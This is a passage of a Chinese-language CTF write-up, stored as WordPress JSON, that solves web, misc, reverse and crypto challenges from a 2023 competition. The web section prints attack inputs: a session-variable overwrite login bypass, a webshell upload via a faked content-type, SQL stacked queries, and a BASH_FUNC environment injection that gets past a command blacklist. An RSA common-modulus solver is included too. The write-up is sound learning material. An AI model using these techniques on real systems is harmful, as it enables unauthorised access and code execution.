\/?path=\/var\/llogog\/nginx\/access.llogog<\/code><\/p>\n\u8d2d\u4e70FLAG<\/h2>\n
\u968f\u4fbf\u767b\u5f55\u4e00\u4e2aadmin\uff0c\u6539js\u91cc\u7684update_my_value(uname, 100000000)<\/code>\uff0c\u8fbe\u5230\u79ef\u5206\u53bb\u8d2d\u4e70flag<\/p>\n![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd1.png\")
<\/p>\n
\u4e00\u53ea\u5c0f\u871c\u8702<\/h2>\n
\u5229\u7528\u53d8\u91cf\u8986\u76d6\u6f0f\u6d1e\u5bfc\u81f4\u540e\u53f0\u767b\u9646\u7ed5\u8fc7\uff0c\u5728index.php\u4e2dpost\u4e0b\u5217\u53c2\u6570\u518d\u76f4\u63a5\u8bbf\u95eeadmin\/admin.php\u5373\u53ef\u76f4\u63a5\u767b\u9646<\/p>\n
_SESSION[login_in]=1&_SESSION[admin]=1&_SESSION[login_time]=99999999999<\/code><\/pre>\n\u518d\u5229\u7528\u8be5cms\u7684\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd2.png\")
<\/p>\n
\u4fee\u6539content-type\u4e3aimage\/png\u7ed5\u8fc7\u540e\u7f00\u9650\u5236\u4e0a\u4f20\u4e00\u53e5\u8bdd\u6728\u9a6c<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd3.png\")
<\/p>\n
\u8bbf\u95eeupload\/img\/.php\u5373\u53efgetshell<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd4.png\")
<\/p>\n
Better_php<\/h2>\n
index.php.bak\u8bfb\u6e90\u7801<\/p>\n
<?php\ninclude 'conn.php';\n$query = $_GET["query"];\nif(!is_string($query)){\n die();\n}\nif(preg_match('\/log|local|set|file\/i', $query)){\n die('no hack');\n}\n$result = $mysqli->query($query);\nif ($result === false) {\n die("database error, please check your input");\n}\n$row = $result->fetch_assoc();\n\nif($row === NULL){\n die("searched nothing");\n}\nif(in_array($query, $row)){\n system('echo Great hacker, but there are bigger challenges waiting for you next,you can find someting in ;ls');\n}\n$result->free();\n$mysqli->close();<\/code><\/pre>\n\u901a\u8fc7sql\u8bed\u53e5\u6784\u9020\u4f7fin_array\u6210\u7acb\u7684\u6761\u4ef6<\/p>\n
http:\/\/vt.jnxl2023.sierting.com:31188\/?query=create table flag1(flag1 varchar(30) not null);\nhttp:\/\/vt.jnxl2023.sierting.com:31188\/?query=INSERT INTO flag1 VALUES('select * from flag1;');\nhttp:\/\/vt.jnxl2023.sierting.com:31188\/?query=select * from flag1;\n\u5f97\u5230\u6709\u8fd9\u51e0\u4e2a\u76ee\u5f55CONST.php adca4977cb42016071530fb8888105c7.php conn.php index.php index.php.bak<\/code><\/pre>\n\u8bbf\u95eeadca4977cb42016071530fb8888105c7.php<\/p>\n
<?php\nerror_reporting(0);\n\nforeach ($_REQUEST['env'] as $key => $value) {\n if (blacklist($value)) {\n $a=putenv("{$key}={$value}");\n }else{\n echo "Hack!!!";\n }\n}\nhighlight_file(__FILE__);\nfunction blacklist($a){\n if (preg_match('\/ls|x|cat|tac|tail|nl|f|l|a|g|more|less|head|od|vi|sort|rev|paste|file|grep|uniq|\\?|\\`|\\~|\\@|\\.|\\'|\\"|\\\\\\\\\/is', $a) === 0){\n return true;\n }\n else{\n return false;\n }\n}\ninclude ".\/index.php";\n?><\/code><\/pre>\nputenv("{$key}={$val}");<\/code>\u7684\u4e00\u4e2atrick\uff0c\u53c2\u8003https:\/\/tttang.com\/archive\/1450\/\uff0cindex.php\u91cc\u9762\u6709system echo\uff0c\u53ef\u4ee5\u89e6\u53d1\uff0cban\u4e86\u8bb8\u591a\u8bfb\u6587\u4ef6\u51fd\u6570\uff0c\u8fd8\u6709sed\u53ef\u4ee5\u7528\uff0c\u642d\u914d\u901a\u914d\u7b26\u7ed5\u8fc7\uff0cpayload\u5982\u4e0b<\/p>\nhttp:\/\/vt.jnxl2023.sierting.com:31785\/adca4977cb42016071530fb8888105c7.php?query=select * from flag1;&env[BASH_FUNC_echo()]=() { sed p \/[e-h]1*; }<\/code><\/pre>\n![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd5.png\")
<\/p>\n
flag{3af85c0ee5bef9ead47d74ae21913771}<\/p>\n
Misc<\/h1>\n\u672a\u77e5\u7684\u52a0\u5bc6<\/h2>\n
\u52a0\u5bc6\u538b\u7f29\u5305\uff0c\u62d6\u5165winhex\u770b\u5230\u6587\u4ef6\u6700\u540e\u63d0\u793a\u5bc6\u7801\u662fSiertingXXXX\uff0cX\u4e3a\u6570\u5b57\uff0c\u63a9\u7801\u7206\u7834\u5f97\u5230\u5bc6\u7801Sierting2023<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd6.png\")
<\/p>\n
\u89e3\u538b\u5f97\u5230Virtual\uff0cfile\u4e00\u4e0b\u53d1\u73b0\u662fvmdk\u6587\u4ef6\uff0c\u62d6\u5165winhex\u53d1\u73b0enc\u6587\u4ef6<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd7.png\")
<\/p>\n
\u5bfc\u51fa\uff0c\u6839\u636e\u6587\u4ef6\u5927\u5c0f\u731c\u6d4b\u662f\u52a0\u5bc6\u5bb9\u5668\uff0c\u7528veracrypt\u5de5\u5177\u6302\u8f7d\uff0c\u5bc6\u94a5\u4ecd\u7136\u662fSierting2023<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd8.png\")
<\/p>\n
\u78c1\u76d8\u91cc\u6709.flag.swp\u6587\u4ef6\uff0c\u7528winhex\u6253\u5f00\uff0c\u5728\u7ed3\u5c3e\u770b\u5230flag<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd0.png\")
<\/p>\n
flag{d89421ac9cf847b0173ee08a74cfd48b}<\/p>\n
Datas_secret<\/h2>\n
\u975e\u9884\u671f\uff0c\u5c31\u8bf4\u548b\u8fd9\u4e48\u5feb\u6709\u633a\u591a\u4eba\u89e3\u3002\u3002\u3002\u76f4\u63a5\u62d6\u5230winhex\u641c\u7d22flag{\u770b\u5230flag<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd9.png\")
<\/p>\n
flag{23030d1c2aa90debdf7757782e9f1ee9}<\/p>\n
\u65f6\u95f4\u4e0d\u591a\u4e86<\/h2>\n
\u67e5\u770b\u4e8c\u7ef4\u7801\uff0c\u7b2c12\u300114\u300115\u300116\u300125\u300126\u300127\u300135\u300136\u300137\u300138\u5f20\u4e8c\u7ef4\u7801\u626b\u63cf\u5f97\u5230\u4e0d\u540cbase64\u5b57\u7b26\u4e32\uff0c\u89e3\u7801\u5f97\u5230\u51e0\u7ec4\u6570\u5b57\uff0c\u6839\u636e\u9898\u76ee\u63cf\u8ff0\uff0c\u572811\u6708\u621612\u6708\u7684\u65e5\u5386\u4e2d\u6309\u7ed9\u51fa\u6570\u5b57\u53ef\u4ee5\u770b\u5230\u5927\u81f4\u5b57\u7b26\u4e32\uff0c\u6bd4\u5982<\/p>\n
2 3 4 9 15 17 18 23 30\u53ef\u4ee5\u770b\u51fa\u4e3a\u5b57\u7b26\u4e32f<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd10.png\")
<\/p>\n
2 3 4 9 15 17 18 23 30\n6 13 20 27 28\n2 15 22 17 24 16\n6 5 4 11 18 25 26 27 28 20 21\n2 3 9 15 23 30 31\n5 13 20 27 14 21\n6 19 26 21 28 20\n9 10 11 17 24 31\n1 2 3 8 15 16 17 22 29 30\n2 3 9 16 17 24 30 31\n2 8 15 23 24 18 11 3\n1 2 9 17 23 30 29<\/code><\/pre>\n\u4ee5\u6b64\u7c7b\u63a8\u5f97\u5230flag<\/p>\n
flag{DATESO}\uff08\u8fd9\u4e2aD\u662f\u771f\u7684\u62bd\u8c61\uff0c\u5f53\u65f6\u8fd8\u662f\u4eceATE\u4ee5\u53ca\u9898\u76ee\u63cf\u8ff0\u63a8\u6d4b\u51fa\u6765\u7684\uff09<\/p>\n
\u5351\u52a3\u7684\u624b\u6bb5<\/h2>\n
\u5e38\u89c4\u53d6\u8bc1\uff0c\u7528volatility\u5de5\u5177filescan\u53d1\u73b0chuyin.png<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd11.png\")
<\/p>\n
\u5bfc\u51fa\uff0czsteg\u4e00\u628a\u68ad<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd12.png\")
<\/p>\n
flag{Hat3une_M1ku}<\/p>\n
IC-Card<\/h2>\n
\u6ca1\u60f3\u5230\u80fd\u62ff\u4e2a\u4e00\u8840\uff0c\u800c\u4e14\u540e\u9762\u4e5f\u6ca1\u4eba\u51fa\u3002\u3002\u3002
\n\u7528IC\u5361\u5206\u6790\u5de5\u5177\u770b\u4e0d\u51fa\u6765\u4ec0\u4e48\u4e1c\u897f\uff0c\u60f3\u7740\u4ece\u5341\u516d\u8fdb\u5236\u6570\u636e\u5165\u624b<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd13.png\")
<\/p>\n
winhex\u6253\u5f00bin\u6587\u4ef6\uff0c\u590d\u5236\u524d\u4e24\u4e2a\u6247\u533a\u7684\u5185\u5bb9\uff0c\u5341\u516d\u8fdb\u5236\u53cd\u8f6c\u770b\u5230\u4e86\u4e00\u7ec4\u5b57\u7b26\u4e32<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd14.png\")
<\/p>\n
\u6d4b\u8bd5\u53d1\u73b0q1s1n1c1t1f1\u5c31\u662f\u538b\u7f29\u5305\u5bc6\u7801<\/p>\n
\u7136\u540e\u57287de33362155ec16d9c5b2535413bad844728baca137d203839aa3274a1ae7681.json\u6587\u4ef6\u53d1\u73b0flag\u7684base64\u5173\u952e\u5b57<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd15.png\")
<\/p>\n
\u89e3\u7801\u5f97\u5230flag<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd16.png\")
<\/p>\n
flag{f11agggiveyou!!!}<\/p>\n
Re<\/h1>\nbabyRE<\/h2>\n
\u7b7e\u5230\u9898<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd17.png\")
<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd18.png\")
<\/p>\n
TEA<\/h2>\n
flag\u65e0\u52a0\u5bc6\uff0cida\u6253\u5f00\u76f4\u63a5\u51fa<\/p>\n
unsigned char v9[19] = {};\nv9[0] = 'f';\nv9[1] = 108;\nv9[2] = 97;\nv9[3] = 103;\nv9[4] = 123;\nv9[5] = 116;\nv9[6] = 101;\nv9[7] = 97;\nv9[8] = 95;\nv9[9] = 115;\nv9[10] = 48;\nv9[11] = 95;\nv9[12] = 101;\nv9[13] = 97;\nv9[14] = 51;\nv9[15] = 121;\nv9[16] = 33;\nv9[17] = 125;\nprintf("%s",v9);<\/code><\/pre>\nEasyRE<\/h2>\n
\u6253\u5f00\u770b\u5230\u662f\u4e2aAES\u52a0\u5bc6<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd19.png\")
<\/p>\n
\u4f46\u662f\u5bc6\u6587\u4e2d\u63ba\u6742\u4e86\u4e00\u4e2a\u6362\u884c\u7b26\uff0c\u53bb\u6389\u6362\u884c\u7b26\u5219\u987a\u5229\u89e3\u51faflag<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd20.png\")
<\/p>\n
XXTEA<\/h2>\n
rust\uff0c\u5b9e\u9645\u4e0a\u662fAES\u52a0\u5bc6<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd21.png\")
<\/p>\n
\u9898\u76ee\u4e2d\u7ed9\u4e86\u89e3\u5bc6\u6d41\u7a0b\uff0c\u4e8e\u662f\u76f4\u63a5\u63a7\u5236\u8df3\u8f6cwin\u5206\u652f\uff0c\u5e76\u4fee\u6539\u5165\u53c2<\/p>\n
\u5f97\u5230flag<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd22.png\")
<\/p>\n
GORC<\/h2>\n
go\u8bed\u8a00RC4<\/p>\n
\u52a8\u8c03\u62ff\u5230key\u548c\u5bc6\u6587<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd23.png\")
<\/p>\n
\u5728\u7ebf\u89e3\u5bc6\u5f97\u5230flag<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd24.png\")
<\/p>\n
Crypto<\/h1>\neasyRAS<\/h2>\n
\u6839\u636e\u63d0\u793a\uff0c\u5173\u6ce8\u516c\u4f17\u53f7\u5e76\u804a\u5929<\/p>\n
![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd25.jpg\")
<\/p>\n
\u62ff\u5230\u516c\u79c1\u94a5\u548c\u5bc6\u6587\uff0c\u89e3\u51faflag<\/p>\n
-----BEGIN RSA PRIVATE KEY-----\nMIICWwIBAAKBgQCjkl\/AEfPwrKmrD3wu1S+Wic4nPFvShSNfdtEh4RIZnFne8qeQ5fVH14MyxyCGSRMXew9QsCMQDBwDR1eqhf+xRHncBDB7rAcWwFrI10FBhXhDJs6PklFW20Zw0sP42cAjaKH0H7pFTu\/uQgc1eUvzeVg05PvG78H6wwwPQB3VuQIDAQABAoGADZ61jFeyWTr3UcATVg74TG+jE89J0gi1\/k\/1b\/2+tRU4woCwBTewqc+\/I+5Cvgu9pDnh95UDBmYLuxYorZFEzgrSa3rZ5y7OFQZl9nXapt2LttBXoQaWf3jtyslsGmfNi\/VuNgKaiiVwINhVG8NeIFzzAB3AqNDitHlKDalkKZECQQDN1lZKV8bximZNDVL9CajmdE6f3DobYgGNvOXsOS4Qkzx+\/3LvAbqSiiiel5V08pBIG18DRIpxBRN57z8fbJxlAkEAy28zeeMeb3ZFL7\/iyosQ8RWrz3\/BxlUtREh9GSplRa7EJtjm852IQCk98lg2HR++tuugmdtVAS0lxd\/UVDXMxQJAFaVwtai9dzFCyN+Z1pppdLLOgek7Ax4vY6R12X255mxVdFWQ1Kmt4TM+Sk9OnFnV6n9WYpWWqYQLJEuQq9FUMQJAe6Vt+yJhCEwxRxFw7bxSosWSNL8o7rwslDke1+HdxdmwXRAuZ1mTS7QFc7vLwC3gQ9u5NGqMIvfm4nrl2f0NJQJAJrOQDrZX\/KpYAnFmW8IGXxkcJrtdB2Xi9VN1WdC9r4QGz28X5ScH0o9mcYVxaDxzNU7A9DPiRL28fAltiGdJLg==\n-----END RSA PRIVATE KEY-----\nQhS9n7TkavmU8E4CFa872ZzqIq\/NG\/agtCkxQBzB0\/E1PDZRv6otOYxBLsxwd\/7h0fPkYYMCpPt4nXqYBGQ\/n8\/F3q3spV94+IFs7+CjyybUvAQg8MXLgSTzVt+ua0Ub0\/et5\/7Q1xAcgzT3\/jWHwjklEAykdpSYMAqv5PQrhT4=\n-----BEGIN RSA PUBLIC KEY-----\nMIGJAoGBAKOSX8AR8\/CsqasPfC7VL5aJzic8W9KFI1920SHhEhmcWd7yp5Dl9UfXgzLHIIZJExd7D1CwIxAMHANHV6qF\/7FEedwEMHusBxbAWsjXQUGFeEMmzo+SUVbbRnDSw\/jZwCNoofQfukVO7+5CBzV5S\/N5WDTk+8bvwfrDDA9AHdW5AgMBAAE=\n-----END RSA PUBLIC KEY-----<\/code><\/pre>\n![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd26.png\")
<\/p>\n
babyRSA<\/h2>\n
\u5171\u6a21\u653b\u51fb<\/p>\n
import re\nimport math\nimport sage\nimport gmpy2\nimport random\nimport requests\nimport primefac\nimport itertools\n\nfrom sympy.ntheory.modular import isprime\nfrom functools import reduce\nfrom Crypto.Hash import *\nfrom Crypto.PublicKey import *\nfrom Crypto.Signature import *\nfrom Crypto.Util.number import *\nfrom Crypto.Hash import SHA256\nfrom Crypto.PublicKey import RSA\nfrom Crypto.PublicKey import ElGamal\nfrom Crypto.Signature import pkcs1_15\nfrom Crypto.Util.number import long_to_bytes, bytes_to_long, getPrime, isPrime\n\nclass rsa:\n def __init__(self):\n self.p = 0\n self.q = 0\n self.N = self.p * self.q\n self.m = 0\n self.c = 0\n self.d = 0\n self.e = 65537\n self.f_N = (self.p - 1) * (self.q - 1)\n\n # getM\n def getM_sameN_e1e2c1c2(self, e1, e2, c1, c2):\n """\n :arg\n self.N: \u5fc5\u987b\u662f\u76f8\u540c\u7684N\u624d\u80fd\u5171\u6a21\n :param e1: e1\n :param e2: e2\n :param c1: c1\n :param c2: c2\n :return:\n self.m: \u5fc5\u987b\u662f\u4e24\u6bb5\u76f8\u540c\u7684\u5bc6\u6587\n """\n\n # \u5171\u6a21\u653b\u51fb\n def egcd(a, b):\n x, lastX = 0, 1\n y, lastY = 1, 0\n while b != 0:\n q = a \/\/ b\n a, b = b, a % b\n x, lastX = lastX - q * x, x\n y, lastY = lastY - q * y, y\n return lastX, lastY\n\n s = egcd(e1, e2)\n s1 = s[0]\n s2 = s[1]\n if s1 < 0:\n s1 = -1 * s1\n c1 = primefac.modinv(c1, self.N)\n if c1 < 0:\n c1 += self.N\n elif s2 < 0:\n s2 = -1 * s2\n c2 = primefac.modinv(c2, self.N)\n if c2 < 0:\n c2 += self.N\n self.m = (pow(c1, s1, self.N) * pow(c2, s2, self.N)) % self.N\n return self.m\n\nflag1= 295658788074157816670393593671184451782123605135184996662528766686642109492132533952160456440919197939935742027629210419312032730004032666912404179229952394343569590488768472800784830058534578639706805456277578757250365834591813481786084959844340418320620440636997732915872346619679993987903742079972676425404864295283955565746004124045155664762158516005326368384488346997494926539295740248007606864906884407198601326915643000764477435205579583836917598642053869541648731754384026407310786288997756775232852732033054591953078116290088267188296560877481534143707414153749140670404213262630122369941889862912426176115220410931992046973925991075473656781794097329513119548617920256625579072719981729556158392454956362838720993254919638177786730004086883044525967823454986241038123671907279715773848673713008902432841449556980494600938989397567019338970200872333713986608537678650318511128703055185979834233315117153115613952940778789222515375743186066883492596068186378372611075958909412662251913621375996518671118244409393829141365207153662416265238312206577474940661548038715230313608405518108581922154335405303862701783678336161505643508831482409054761542959278392940037561736468155509922530420964726953308604138731805543997557197893\nflag2= 219454357017359138238563345020257296433275019950745269658921329153689267055871241202626317639487122341365759606018366576305678949982408366815977617307888894995289951707241009621444691307275542686770303994110416384086739599181934011812163156338859395115724413628620575935425221522079154607411877822646179457455118804970038865452163833416447505142114976758532806787419762250921421272492466133659234602794242531776209324085944417173098820895755851386042954303555790085402616519592065446023510096773546730662074307900123349548340507067971393642039476326402523930789953483843698593104578179169624886357604650615249286150367204109726460230037005175927865466199600272190112483494387929732049738312695796015009178606906549093365261114132002222704510637261038978031857378729856467918978246977163353146981239215886053379980533235786905270211605457443266127512667882149285155542735532327780898540341696557860555884277608448996773250847560675650046440569736010800155992053362696097992699863059686881689842065077997427372972290872427656847223849769329713841670853267584161386494525686204330028142217737052411422895042170169703550774908415280261731967511925122636118468176645781785352430657090024109246103061415446942211482659025722233229083093876\nn= 549785700554963543393222974982211136067042846536450239199968863551137077564447156832697813202963334596948298760762991663065504535035143397250208506445202607659676332816610122258862787906629525548439909792727593939957178783466989816894454522630301104349317697612174888605090061231211194974337772507249418567229560145454791075929946332668360553910328900103264562348881791004831033587660163923517440406942993348972589262051083908075790422096042338651001937740085414301019827335549437397656318095919875053213333008551761167437683250592542156348138055482054331330609375930693247365749085041596578748797801601289693449629548744535914348450016287545136436964138806081283470239420969311905998245715160353982174880912315601876305613349276824998688275587308133069178764001924866079232824850209407236694426779262951463035278887804883917516580169051530590466082511045503107508117656821592538792566264160105940730326929474477787053681516844548383814388361089499629312831727731267796167205124844987064389097138747938870221504684958713047985374714612321540288239995935347905120710583169131356970267386562665138437631517802641426575996558648777831102462652517305151412695166331935115971277205305816897886952646432233312318756155702046584205507027737\n\ne1 = 3247473589\ne2 = 3698409173\n\ncheck = rsa()\ncheck.N = n\nprint(long_to_bytes(check.getM_sameN_e1e2c1c2(e1,e2,flag1,flag2)))<\/code><\/pre>\nflag\uff1aflag{baby_r3a_sierting_2023}<\/p>\n
\u7b80\u5355\u7684Python<\/h2>\n
\u6ca1\u5565\u597d\u8bf4\u7684\uff0c\u7167\u7740\u9898\u76ee\u6539\u5c31\u884c\u4e86\uff0c\u6709\u4e00\u4e2a\u5c0f\u5751\uff0c\u62a5\u9519\u63d0\u793a\u52a0\u5bc6\u7684flag\u6709\u7a7a\u683c\uff0c\u628a\u7a7a\u683c\u66ff\u6362\u6389\u5c31\u884c\uff0c\u76f4\u63a5\u7ed9exp<\/p>\n
from qsnctf import *\nfrom EasyPython import flag\n\nflag=flag.replace(' ','')\nflag=base100_decode(flag)\nfor i in range(20):\n flag = base64_decode(flag)\nflag=atbash_cipher(flag)\nfor i in range(21):\n flag = string_reverse(flag)\nflag = caesar_decrypt(flag, 8)\nprint(flag)<\/code><\/pre>\n![\"\"](\"http:\/\/www.s1mh0.cn\/blog\/wp-content\/uploads\/2023\/11\/sd27.png\")
<\/p>\n
flag{dea8a56c1dcf73ae7fa75c52af41bb70}<\/p>\n
<\/div>","protected":false},"excerpt":{"rendered":"Web \u65e5\u5fd7\u91cc\u7684FLAG \u53cc\u5199\u7ed5\u8fc7\u8bfbnginx\u65e5\u5fd7\/?path=\/var\/llogog\/nginx\/acces […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-82","post","type-post","status-publish","format-standard","hentry","category-wp"],"views":2118,"_links":{"self":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/82","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=82"}],"version-history":[{"count":14,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/82\/revisions"}],"predecessor-version":[{"id":323,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/posts\/82\/revisions\/323"}],"wp:attachment":[{"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=82"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=82"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.s1mh0.cn\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=82"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}